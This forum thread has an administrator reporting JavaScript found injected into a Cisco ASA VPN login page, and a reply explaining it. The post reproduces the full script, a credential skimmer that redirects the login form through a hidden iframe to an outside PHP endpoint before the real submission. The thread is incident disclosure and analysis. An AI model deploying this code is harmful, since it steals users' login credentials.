Help! Javascript on my firewall

[Laser402]

Hello All

We run a Cisco ASA, with a web portal on it yesterday i noticed the login page was running this script.

        var xss = function(){         var x = {             'name':'xss.js',             'version':'0.2.2',             'author':''         };         x.x=function(id){return document.getElementById(id)};         x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};         x.i={             i:!!self.ActiveXObject&&(function(){                 for(var v=6,s=document.createElement('s');                     s.innerHTML='<![if gt IE '+(v++)+']><i></i><![endif]-->',                     s.getElementsByTagName('i')[0];);                 return v;             }()),             c:!!self.chrome,             f:self.mozPaintCount>-1,             o:!!self.opera,             s:!self.chrome&&!!self.WebKitPoint         }         x.rdm=function(){return~~(Math.random()*1e5)};         x.ec=encodeURIComponent;         x.html=function(){             return document.getElementsByTagName('html')[0]                     ||document.write('<html>')                     ||document.getElementsByTagName('html')[0];         };         x.kill=function(e){             e.parentElement.removeChild(e);         };         x.bind=function(e,name,fn){             e.addEventListener?e.addEventListener(name,fn,false):e.attachEvent("on"+name,fn);         };         x.ready=function(fn){             if(!x.i.i){                 x.bind(document,'DOMContentLoaded',fn);             }else{                 var s = setInterval(function(){                     try{                         document.body.doScroll('left');                         clearInterval(s);                         fn();                     }catch(e){}                 },4);             }         }         x.o=function(url){             var link = x.dom('<a href="'+encodeURI(url)+'">',1);             return link.protocol+link.hostname+':'+(link.port||80)==location.protocol+location.hostname+':'+(location.port||80);         };         x.dom=function(html,gcsec){             var tmp = document.createElement('span');             tmp.innerHTML=html;             var e = tmp.children[0];             e.style.display='none';             x.html().appendChild(e);             gcsec>>0>0&&setTimeout(function(){                 x.kill(e);             },gcsec*1000);             return e;         };         x.xform=function(form,action){             form.old_action=form.action,form.old_target=form.target,form.action=action;             var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');             form.target=iframe.name;             setTimeout(function(){                 x.bind(iframe,'load',function(){                     form.action=form.old_action,form.target=form.old_target,form.onsubmit=null,form.submit();                 });             },30);         };         return x;     }();     xss.xform(document.getElementById('unicorn_form'),"https://www.rusi.org.au/documents/biodata/x.php");

The code is located at http://www.rusi.org.au/documents/biodata/1.js im not sure if the site is just a front for something sinister or what.

 

[Laser402]

By the looks of it, it's submitting the form data to https://www.rusi.org.au/documents/biodata/x.php from an iframe.

Using an iframe to submit let's it do it without refreshing the page, sort of like AJAX.

If the website in question is in fact legit, they've most likely shelled the server to upload their scripts.

Thanks for your help, I thought the worst. Now to reset all passwords. Joy